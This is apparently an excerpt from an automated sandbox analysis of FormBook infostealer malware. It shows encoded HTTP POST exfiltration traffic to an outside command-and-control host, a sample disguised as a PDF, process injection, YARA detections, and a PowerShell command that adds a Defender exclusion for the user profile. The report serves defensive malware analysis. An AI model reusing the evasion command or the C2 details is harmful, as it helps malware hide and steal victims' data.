GtOvYbVarcNa3v-(0wy0jT60_RXnjSROBL8KVA-TQAN00trzuBjNY7qYiaLs05X4760XutVUQ2XKdmZBjxtHvEMrD2JEkvPrFhQJSs6X63OeBZuBuxWj_FJnOn6FS(S1SkP2uPWK6FEEJQSN8ZE04nZjhL6W9PAsBJ_aN6P0Y61FAOsCP [TRUNCATED]
Sep 22, 2024 17:27:13.405793905 CEST	2472	OUT	Data Raw: 4a 73 48 64 38 79 39 38 52 59 69 79 58 6a 7a 6e 6b 32 48 6a 63 59 78 71 78 44 71 4c 35 62 74 48 35 45 74 7a 30 37 68 5f 4d 56 38 6c 31 57 51 69 53 68 6f 71 4e 6e 43 37 53 36 4a 53 33 51 75 45 79 61 37 70 75 41 45 77 77 63 33 47 70 30 54 6b 6c 67 Data Ascii: JsHd8y98RYiyXjznk2HjcYxqxDqL5btH5Etz07h_MV8l1WQiShoqNnC7S6JS3QuEya7puAEwwc3Gp0TklgO-KRVwAXyykUNWt4SUBpyEPCVB9BK79RWn8MVVggK7j5aJ5e5eLB2l0nHtF0pWmRg-LWQIK2(ZEghPohaT4EIJgQKP43JXFq8zFbKgZ6LWrEnc3Jtczkbrhxt_pUCZBh~nzImTyo5YOgFCvkVC69UUOKE8PoYDRMC
Sep 22, 2024 17:27:13.407118082 CEST	4944	OUT	Data Raw: 33 71 32 5a 70 57 67 73 39 34 71 50 44 50 37 34 28 73 70 30 42 58 67 65 6b 4b 47 76 4e 74 36 73 6c 48 44 4e 53 6e 67 33 6e 35 4c 52 43 5f 55 41 34 62 63 52 39 46 59 79 59 64 71 47 53 47 4f 4c 78 79 6b 76 7e 5a 66 57 74 56 48 75 63 6d 62 6e 51 48 Data Ascii: 3q2ZpWgs94qPDP74(sp0BXgekKGvNt6slHDNSng3n5LRC_UA4bcR9FYyYdqGSGOLxykv~ZfWtVHucmbnQHGlQjWt4apSb5NiuXyvXKWmndmkQQ5UvxFj1lu-KtL_7JgAdjHOSPE8OJHKBtJ3Zo7qwo(zLJdTbgE03Bisb3l6cUsrW7wJ5P0id7lqYFkfkSnFJyTZ3fGqn5oMeeZzT-HNp2edlYJ9esMQhuMtS8bxtAq2Gwot(-x
Sep 22, 2024 17:27:13.407138109 CEST	4944	OUT	Data Raw: 78 6a 6f 50 79 39 33 4c 77 74 75 6f 4e 2d 6a 59 48 42 7e 71 66 69 45 76 55 78 30 62 4b 5f 76 55 69 66 6f 69 4f 61 33 54 75 78 78 59 32 7a 72 7a 42 35 6d 59 76 4b 76 63 57 66 4a 77 79 69 38 4a 53 62 47 37 36 57 37 4e 49 6b 73 59 38 48 6b 6b 46 38 Data Ascii: xjoPy93LwtuoN-jYHB~qfiEvUx0bK_vUifoiOa3TuxxY2zrzB5mYvKvcWfJwyi8JSbG76W7NIksY8HkkF8qWELHAjTdWNz6uCFsumk6l2_qlkS5s2FnX1KvPCxB2ztiNANE-iuOhArpxHNT13Q(W39a42VAGM0zhUNfDEzIreL6WMkpaWwNqQmBo9r9eGIgJ~1QV1DvgKypBV1H3FOnR6bTkIXDDMQb1cSxdY_1apkCwayo2Yj8
Sep 22, 2024 17:27:13.409547091 CEST	4944	OUT	Data Raw: 52 69 75 6e 39 33 6f 50 35 70 67 67 4e 6d 42 35 44 7a 75 39 66 6a 78 62 4b 4a 71 34 4d 71 28 76 56 72 7a 5a 70 4f 72 6c 41 6b 79 75 4b 43 78 34 71 34 56 34 5a 72 72 67 73 50 38 55 43 31 78 52 36 59 67 68 6f 44 32 46 69 31 35 48 7e 4e 69 4c 7a 4e Data Ascii: Riun93oP5pggNmB5Dzu9fjxbKJq4Mq(vVrzZpOrlAkyuKCx4q4V4ZrrgsP8UC1xR6YghoD2Fi15H~NiLzNapu2wpr_haMQHRWCjESLkOV7t4IOGGJvRZTpg3pMbztCT2u5oghTDCmIax6919gb(ipBNYfEcRCa(2lgPrA98qG0UJCsJD(cYrxnA_Q05fidkTqVxbjgnDyDvzC7SxDaCR4z0-3fG5el3uG2Uv6xWIYOnIthbsAWc
Sep 22, 2024 17:27:13.409567118 CEST	2472	OUT	Data Raw: 55 59 74 5a 45 66 72 75 34 48 49 77 77 4d 45 70 6f 4f 62 6a 7a 32 67 4f 7e 71 4c 57 52 44 73 74 4c 69 5a 45 72 53 51 4f 4f 31 70 6f 4a 36 6a 51 78 4d 7a 6c 50 6c 76 6e 36 43 4a 47 56 6d 7a 6a 4a 4d 56 2d 4b 35 30 7a 35 62 5a 67 6d 58 49 58 43 50 Data Ascii: UYtZEfru4HIwwMEpoObjz2gO~qLWRDstLiZErSQOO1poJ6jQxMzlPlvn6CJGVmzjJMV-K50z5bZgmXIXCPrEBwwpt4PR6Y(XjiPAwQsY8StVPH(a7iW8gHgEVCJORgpGTa9P~BCtfIRhndXC9mL8ybz0W0CfnJyaHMVbP3ucraXv1bITH6hTK87Uleo-qAGLzY1BmL(n(_lFmicrRMWrnr8PgZKcWZtYySmDFWeQNPvH32(1pO2
Sep 22, 2024 17:27:13.409589052 CEST	2472	OUT	Data Raw: 66 77 64 58 6b 52 53 50 59 75 5a 4a 62 55 65 6a 7a 51 7a 33 48 30 67 7a 53 57 5a 51 57 30 49 45 62 4b 48 6d 34 30 63 64 70 4f 7e 35 57 54 7a 38 78 45 70 42 36 78 5a 7a 46 71 63 69 61 4b 39 45 58 32 37 53 45 65 4e 76 28 52 73 4b 7a 58 5a 56 53 78 Data Ascii: fwdXkRSPYuZJbUejzQz3H0gzSWZQW0IEbKHm40cdpO~5WTz8xEpB6xZzFqciaK9EX27SEeNv(RsKzXZVSxqtW2zBI3nfL962U8p45NR-x07Sm7cVGUsLs30-cwmmg4iC1Y4dskYJJvAalBNvUCETduPPdJ1B2vGok2T2A5o31ZUHYD0K8xOCa7sWnMgKEUkfHbIN2F5U4Qq5cd38NxOOhMB25JjcAO97MT8Gsh4ivaQruXHqk7g
Sep 22, 2024 17:27:13.409862041 CEST	2472	OUT	Data Raw: 7a 57 41 4f 46 57 54 6b 69 67 37 70 72 4e 47 54 54 4b 61 38 30 71 73 4d 51 36 28 31 71 48 4a 7a 33 56 75 35 62 30 35 72 78 57 45 53 6b 58 43 64 54 53 45 78 33 4a 62 66 49 36 6b 4e 53 71 64 4e 75 36 31 34 5a 4b 4f 62 74 65 61 54 66 36 4c 36 72 51 Data Ascii: zWAOFWTkig7prNGTTKa80qsMQ6(1qHJz3Vu5b05rxWESkXCdTSEx3JbfI6kNSqdNu614ZKObteaTf6L6rQhUgDwVWjvzwVNCh1V6FhZox9TPSaL5r-gbubAzk_nk4F36qpRxKJg3DWfUdd~NM0Tz8eYXdvYhaZbTtbQugFZMIR5WkL7gx8HZWroOycHZBYMzDi0FlgVMacnBYKqWbyt_De0lYUX5J9qyVIdqdzhD1QX0eqAVgZe
Sep 22, 2024 17:27:13.411086082 CEST	4944	OUT	Data Raw: 50 42 52 62 50 38 28 55 42 63 35 70 74 5f 4a 42 75 47 36 72 43 37 30 6e 76 38 4c 79 38 39 55 4d 7a 79 61 68 47 38 38 77 58 72 50 32 49 46 63 32 54 36 55 65 38 4f 34 54 41 54 4e 58 47 65 4e 39 6b 6d 44 4e 47 78 68 6d 57 4c 71 30 64 53 30 62 78 2d Data Ascii: PBRbP8(UBc5pt_JBuG6rC70nv8Ly89UMzyahG88wXrP2IFc2T6Ue8O4TATNXGeN9kmDNGxhmWLq0dS0bx-GT9sl7FB7mRQpYGKBpW_WiDMJ0Jxgi42fidAxl~XPloueAelx2yj4JFHi9a09YXk9hQGMCZd(2c6peqEsY739pkDqll0f-Vm75alUBdVJ0gYgxRwHmcteOMlhJ0C0EJ5s89LukNWwn6EuoEAXaEH9S9JPegKZSmkQ
Sep 22, 2024 17:27:13.412142038 CEST	4944	OUT	Data Raw: 41 4b 61 72 39 74 32 37 42 44 37 56 43 73 39 36 46 34 36 37 61 45 36 6b 5a 45 31 71 70 57 54 4f 36 44 6d 5f 73 73 35 5f 76 63 62 52 44 79 4a 36 54 6f 41 4c 6c 58 50 34 49 71 4a 51 33 35 61 68 56 38 4b 49 65 37 4d 6c 53 33 61 4e 36 42 34 5a 59 65 Data Ascii: AKar9t27BD7VCs96F467aE6kZE1qpWTO6Dm_ss5_vcbRDyJ6ToALlXP4IqJQ35ahV8KIe7MlS3aN6B4ZYePVknMuCLK636LonDH4CvpEVP58JHO5DY3nW-5WSwiA0dDi3v10K_MoDPyyp-lsiQX_YZpwX3ZsBYjnA25DfKm5XAEYim(Q6-8ebjSrujiPedqcKCFZsB8xqGEPUZDhZTtJQiQc9-zs2uwHhdyhqw3_8Vt0K7twTRB
Sep 22, 2024 17:27:13.412163019 CEST	4944	OUT	Data Raw: 61 76 62 52 65 32 4a 4d 43 38 38 56 49 62 32 77 6b 42 6e 58 4e 4b 55 74 52 49 49 56 4d 45 67 52 56 61 64 44 71 6b 34 52 41 50 56 6d 4b 6b 44 4d 72 69 66 56 39 53 37 69 33 4b 52 76 62 68 36 42 76 34 72 42 74 4a 5a 4f 45 75 70 72 55 6e 6f 66 71 5a Data Ascii: avbRe2JMC88VIb2wkBnXNKUtRIIVMEgRVadDqk4RAPVmKkDMrifV9S7i3KRvbh6Bv4rBtJZOEuprUnofqZV3LSmBfFBGmvx7oAb0uR11jdoqvYTrP96jtMT-NXtVdJnNmqQnne2BhR7XIMAjThAZQxaSc2YCRkUYuho6EWDSE-MieP5pOXqIac8GzmSeXYgG3VTiCAqctHAcqzmeoC6kPEFYhLLd6OWYwFykNFkCDyoSjAHYSan

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49715	203.161.60.191	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 22, 2024 17:28:14.318166018 CEST	12360	OUT	POST /n7ak/ HTTP/1.1 Host: www.jam-nins.com Connection: close Content-Length: 133153 Cache-Control: no-cache Origin: http://www.jam-nins.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.jam-nins.com/n7ak/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6e 72 43 78 4e 44 6b 3d 6b 6f 4a 33 31 72 61 77 34 46 42 4a 35 75 74 51 77 4d 4e 55 4d 43 50 38 64 4e 67 64 4b 44 6a 36 58 41 78 79 56 56 78 61 28 67 65 56 55 34 76 76 36 46 58 63 65 72 45 4a 51 6c 28 77 38 5a 4b 69 61 74 46 4a 58 4f 79 43 6a 41 63 71 4e 6d 66 69 62 77 31 33 65 53 65 48 6a 44 73 2d 6c 65 6b 62 58 30 6e 76 34 77 72 34 61 45 7a 43 41 6e 67 75 6b 30 6a 38 45 7a 63 61 49 56 51 41 64 64 34 53 6c 6c 6c 65 28 6e 39 6d 6c 6f 34 30 70 48 5a 68 75 5a 55 41 62 47 63 61 51 4c 78 47 4e 46 7e 46 30 5f 74 71 71 72 36 6a 45 6c 56 4b 47 33 48 6c 69 42 50 4c 6d 58 4e 2d 30 6e 51 78 6d 79 72 39 57 68 73 4f 77 32 4f 65 78 62 68 62 75 30 58 75 44 35 55 56 66 62 75 58 37 5f 51 55 31 41 41 74 7e 70 76 5a 6d 34 67 32 28 70 74 6c 46 64 39 6e 50 75 59 74 78 76 46 78 31 45 74 43 59 70 47 48 4a 7a 51 4b 56 2d 5a 36 7a 31 68 35 78 46 59 65 30 39 41 42 58 70 50 53 32 49 54 30 45 44 4b 36 6c 30 55 4a 76 68 34 50 46 42 4d 31 35 5a 71 7a 69 56 4f 54 38 6e 6a 5a 39 6c 28 30 30 44 74 4d 6a 39 50 52 73 43 30 70 43 7a [TRUNCATED] Data Ascii: nrCxNDk=koJ31raw4FBJ5utQwMNUMCP8dNgdKDj6XAxyVVxa(geVU4vv6FXcerEJQl(w8ZKiatFJXOyCjAcqNmfibw13eSeHjDs-lekbX0nv4wr4aEzCAnguk0j8EzcaIVQAdd4Sllle(n9mlo40pHZhuZUAbGcaQLxGNF~F0_tqqr6jElVKG3HliBPLmXN-0nQxmyr9WhsOw2Oexbhbu0XuD5UVfbuX7_QU1AAt~pvZm4g2(ptlFd9nPuYtxvFx1EtCYpGHJzQKV-Z6z1h5xFYe09ABXpPS2IT0EDK6l0UJvh4PFBM15ZqziVOT8njZ9l(00DtMj9PRsC0pCzdqhMURYziEEIqrx1S9riJCAitOZFpmQNBTHgeBJjreK-sohXlaX3eNJCfceFJoWic2b4ZQm31q3eHAoddjrjSRxD8FVfnkSWBbQIqJNI5etQJOtMt47cgdiBtXGFSP0PzpIy3sencnl2HwuOhaquko0MKQo4W8hq1aVGJGaHQ0BvTbDCwRKyZLS8uW9S9zVFVTjpQIJR6vXERjwTBQXrU_GeRvz6lZY9FrzD7fhdF5ODRdPPgSeuG2YXNQU-lvz-NnYsJjg-FXw38b(wHiBxaQjPGHu0QOIceuB4Gqk9qW5WP1Qa9yV7Aw4N6OxZBG7rQeBx6b2vtDUi(51xjNEYKCPpjLF86h8o71p5MDn6Cxz-3p7DzS7w~dlz3ZkOnEKqQpoDqJK-TznDaSmFbpDrHocI1OXe8ZbxE-8ibglqlC~1RSToHVMSf5hG24nMGvYwjADbApkAZ-mpfduVlNa9mIXaONfHmVYaXf~Cg2SYIpZwEla9xymwuz4vQBJ8ahmeYJJnGO3uGmoM22~IUBfEWn3AgSjljjM9WVTw~-yw17rlItqRejxGTrzBAZ2eMXgkeM(8HbTkrE6xPoHkTHAzsMvAfp7aicBJeJ380v0k(EmHxr4u8Xe6BywO(Y52yDeWsF4YKaEMlkUQjDP5cqO12nH31gVrplRJF8 [TRUNCATED]
Sep 22, 2024 17:28:14.323553085 CEST	14832	OUT	Data Raw: 37 31 34 57 50 63 42 70 76 67 53 54 73 62 34 74 65 79 43 7a 57 66 6d 7e 38 46 41 6b 53 38 6b 6f 7a 46 33 72 48 58 5a 48 44 67 51 30 39 42 75 59 37 5a 34 56 6a 4e 71 63 5a 55 70 37 56 77 33 63 56 69 42 46 49 78 6a 50 77 64 50 79 52 4c 52 51 32 6d Data Ascii: 714WPcBpvgSTsb4teyCzWfm~8FAkS8kozF3rHXZHDgQ09BuY7Z4VjNqcZUp7Vw3cViBFIxjPwdPyRLRQ2mAmeLed9O75yK2T5KcXBs2Ztu3BwJTN_qa(tPbLi2A~hJhHJ(wxyaUUS8VW4lvyzv0yO(lvOJ7bZnEskpotniq~UoYbi8NLQnFB0yGkd2vDiDuGc1IXtiiWok3oWGgoJxIT8ANoj36~7skyEZbungMJ3Ma3v(0FPbr
Sep 22, 2024 17:28:14.323587894 CEST	4944	OUT	Data Raw: 56 32 4d 57 5f 53 6c 70 75 28 6e 70 77 7a 6d 7e 32 52 49 36 69 44 4b 4e 39 66 38 68 31 50 4b 63 36 44 71 31 52 79 56 43 76 31 6c 59 63 4f 42 50 41 56 5a 57 63 45 54 46 34 61 63 51 49 70 69 78 78 7a 68 4c 76 62 32 6d 44 74 34 6d 61 4f 45 54 7a 39 Data Ascii: V2MW_Slpu(npwzm~2RI6iDKN9f8h1PKc6Dq1RyVCv1lYcOBPAVZWcETF4acQIpixxzhLvb2mDt4maOETz9ZAlzaw7QKRDhh914UIkbdyhHzdklZg1Wwe6qK2TmzpFhxVaKw2Zb_liAEcbKpNe7SqAMUJWo2OQ1RPhdWTjxgltHdzgXXnAo3KLA2exhG6_bb~9Ti4-rG6fC9OSIBXlIl7-KpWvOiyqngV5Uhr0aQ40O1xANBeoxF
Sep 22, 2024 17:28:14.324882984 CEST	2472	OUT	Data Raw: 30 4b 56 47 48 37 6e 52 4a 61 5a 31 5a 6e 6e 37 67 41 44 37 7a 56 79 42 58 4d 75 4e 2d 34 4e 73 67 4f 50 51 63 67 6e 31 59 5a 41 72 66 76 38 34 37 4c 43 51 69 35 65 4b 77 43 6b 28 63 35 6e 77 4f 37 74 42 30 49 79 57 39 55 56 5a 33 78 48 54 68 66 Data Ascii: 0KVGH7nRJaZ1Znn7gAD7zVyBXMuN-4NsgOPQcgn1YZArfv847LCQi5eKwCk(c5nwO7tB0IyW9UVZ3xHThfn0Iqql2pH0_ygEO9v0F1SBiupG8fLMq7m37LZRtjTBwWJpe9P2j6s6Mx82tPUkolXWoMI5BZN7drP9vVVGbyStKT5vuZc54HQHuQttVGAix~-0pvdwkPIj_CsRLkd67p67brEQy7hO_r0WQzUqxotK3EYibzHtxru
Sep 22, 2024 17:28:14.328644991 CEST	7416	OUT	Data Raw: 68 32 39 74 5a 52 36 35 48 4f 4e 71 43 50 6b 57 64 66 5f 50 33 57 56 63 4c 77 75 35 53 31 32 64 56 54 2d 71 30 73 74 47 76 57 6f 53 55 28 56 4b 68 34 39 64 55 44 4b 6f 31 45 61 38 4a 67 58 76 47 6d 37 6d 41 75 31 44 31 54 66 28 30 62 34 72 48 53 Data Ascii: h29tZR65HONqCPkWdf_P3WVcLwu5S12dVT-q0stGvWoSU(VKh49dUDKo1Ea8JgXvGm7mAu1D1Tf(0b4rHSQj3lsWI0NdVudpLdmHgSUc2YhAJbEjyKAj4WlGZOWRFnhFaxbQ4JkysPUNX59zZDjBGo-p7jvPuaeAMl-izy-CGsqO6n4lNjprEiLFvhlET2b5A~Tcgj6s1(E7MqAkgPPRi(ip5qhsJfVFSYYy0r-GomZt6wn(3da
Sep 22, 2024 17:28:14.328722954 CEST	7416	OUT	Data Raw: 44 67 46 30 6b 51 59 6b 67 48 68 66 4f 78 59 6c 6e 7e 42 71 38 7a 56 41 71 59 68 63 31 31 65 7e 32 44 69 43 48 58 49 53 56 68 62 37 4a 48 58 34 53 43 43 57 2d 33 71 73 70 5a 7a 49 34 41 55 6a 36 36 32 33 7a 4d 37 68 6a 48 65 64 4b 6e 4d 74 63 38 Data Ascii: DgF0kQYkgHhfOxYln~Bq8zVAqYhc11e~2DiCHXISVhb7JHX4SCCW-3qspZzI4AUj6623zM7hjHedKnMtc8ykXod2wCXB5rd5W8vga47UgvxHvoxYVdqgr3yMHSjYKa1kFOGoDnojPsgfSLwY8cEdMLjSPNc5J~cR4razOF2bN7Fp7efV1EwUxyBXnonOcNFCggy~vxcv5Wp2D0z6yqJlPEPCu7G0tPe1pLIsPE6C-iEjv4PD8ei
Sep 22, 2024 17:28:14.332803011 CEST	2472	OUT	Data Raw: 58 70 33 74 6c 6a 67 63 65 33 70 6c 72 75 42 52 68 42 32 4b 71 52 50 4c 56 68 47 7e 52 65 32 45 56 4b 37 53 43 6f 70 67 45 4d 72 66 51 4e 66 79 5a 4b 36 6b 57 67 54 31 47 72 45 34 65 74 78 43 6d 57 6e 4d 38 46 4a 4c 39 32 43 56 44 6f 36 6a 52 57 Data Ascii: Xp3tljgce3plruBRhB2KqRPLVhG~Re2EVK7SCopgEMrfQNfyZK6kWgT1GrE4etxCmWnM8FJL92CVDo6jRWzcFtlS3gZsiQ-ykGGYKk1H5WSAeRhjtZ9zKFliAUq0QHN8AnSgZGAbWvPf5MHG0o8TVR6PUbrH-W1yFbakSwVp-5viaI932Wl3SR1soSn9Z13hJWt6b6hvvgSR8FTCYmYrvPgzaoXwWpFV0GIYqqGO2p1oWZCtNDG
Sep 22, 2024 17:28:14.376902103 CEST	34608	OUT	Data Raw: 53 4b 73 50 53 72 74 4f 69 58 6d 63 48 58 4f 46 6a 73 6f 66 62 75 7a 65 64 76 73 32 32 6a 4d 58 74 33 46 4f 68 4c 51 57 4c 45 79 28 4f 53 48 30 5a 66 34 78 49 73 5f 6e 67 75 6a 6c 53 57 76 65 4e 73 67 66 61 6c 37 34 59 28 30 67 53 53 70 69 54 4e Data Ascii: SKsPSrtOiXmcHXOFjsofbuzedvs22jMXt3FOhLQWLEy(OSH0Zf4xIs_ngujlSWveNsgfal74Y(0gSSpiTNyvGR0YeoATuDyJ1v4YdXvxl4brZnqWNd01tXHIQICnlhKqMcV5ut3ajBnK-Xo2C45OuTc2Do_1bsLu0cHKQxTxpyNqKRN7mnZgmaOhD7YXHK6JQx3RH0m5buMZd(yKT7Y7NVJnYKqEUNpeFHK5eo9tKNupihhUIlW
Sep 22, 2024 17:28:14.429254055 CEST	1236	OUT	Data Raw: 36 5a 53 67 4e 71 79 59 46 66 63 7e 72 63 38 70 65 53 61 78 50 65 49 6d 4c 57 41 35 36 78 53 35 41 7e 6f 73 67 71 6d 76 5f 38 63 79 4e 31 4c 79 6b 73 34 74 37 75 68 71 37 44 42 7e 53 47 43 56 4d 49 36 76 44 41 4b 38 4f 7a 6c 78 53 53 59 78 6e 77 Data Ascii: 6ZSgNqyYFfc~rc8peSaxPeImLWA56xS5A~osgqmv_8cyN1Lyks4t7uhq7DB~SGCVMI6vDAK8OzlxSSYxnwr3IZJiDrjEFJgneS_xw17(-Z2LFJJ2QwR0hsgfmL-4qcBcvDJHb~Bf9~Zl9X7RGRTiq4bJNu6wOZCIN8iCHX-xtH-15kfR93jkAC9NGjOzjnEjQCaEfHMQ20Q30f0NThFJ7tOzHrBoU0iVK6wKSQjdQNwwKyePFi7
Sep 22, 2024 17:28:14.484829903 CEST	1236	OUT	Data Raw: 38 6d 7a 43 58 69 4d 77 45 75 33 68 66 7a 30 37 58 6a 53 33 6b 33 74 42 46 41 75 6f 6f 69 77 6d 4b 63 35 63 64 6b 4f 6f 4f 75 72 72 68 57 79 48 31 4a 43 48 7a 70 5a 39 36 79 45 53 6c 37 55 61 72 28 33 5a 47 58 71 6d 37 4c 37 67 42 75 6e 6d 4d 64 Data Ascii: 8mzCXiMwEu3hfz07XjS3k3tBFAuooiwmKc5cdkOoOurrhWyH1JCHzpZ96yESl7Uar(3ZGXqm7L7gBunmMd459Fa6O2tuGxal-(C5Ru9(ZJqFu5lc0o_UCMMchvqVU3Vt4891BgRHPCifQSvICWZs49p77mSpkGNoeh5Is(eKfKT~hG0OwxRkyVSZUSTa8awqu~vEYdKIxi2IJv4ubpG1H7rdgObtcMb0KG21QuF2AYl33G27HND
Sep 22, 2024 17:28:14.540827990 CEST	1236	OUT	Data Raw: 43 39 35 31 42 52 55 6f 4d 6f 47 4d 68 75 37 50 5a 6e 38 28 4d 37 75 4b 34 45 64 59 41 66 53 63 31 6f 69 67 42 65 69 39 37 5a 35 65 47 72 69 78 79 63 73 35 76 43 57 56 70 4f 63 28 7a 50 6a 77 56 54 51 6f 44 74 74 50 6c 70 4d 28 53 35 41 69 42 7a Data Ascii: C951BRUoMoGMhu7PZn8(M7uK4EdYAfSc1oigBei97Z5eGrixycs5vCWVpOc(zPjwVTQoDttPlpM(S5AiBzUV-mTs02nBkBC6xSsPTeJ(Tyn7A~HJL9mcV6lIbrMcGPRH7NGlFH0RG9CRDl4gyoOMewQmAE8g4qdmq9tikIXMYznQ_IbyWISnxUKW8LDp99iYIPr4UCM8wiQ25(SzaR4aAN0Ys3uf4M2X0YBff~TKeJLcDL6lkyl

Target ID:	0
Start time:	11:25:07
Start date:	22/09/2024
Path:	C:\Users\user\Desktop\Specification and Quantity Pdf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Specification and Quantity Pdf.exe"
Imagebase:	0x7ff773c50000
File size:	1'678'432 bytes
MD5 hash:	686FED0AF9EEBB2581701D4E08E9FF0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:25:07
Start date:	22/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:25:07
Start date:	22/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:25:07
Start date:	22/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:25:08
Start date:	22/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\System32\svchost.exe"
Imagebase:
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	11:25:08
Start date:	22/09/2024
Path:	C:\Program Files (x86)\Windows Media Player\wmplayer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Imagebase:	0x260000
File size:	166'912 bytes
MD5 hash:	A7790328035BBFCF041A6D815F9C28DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com 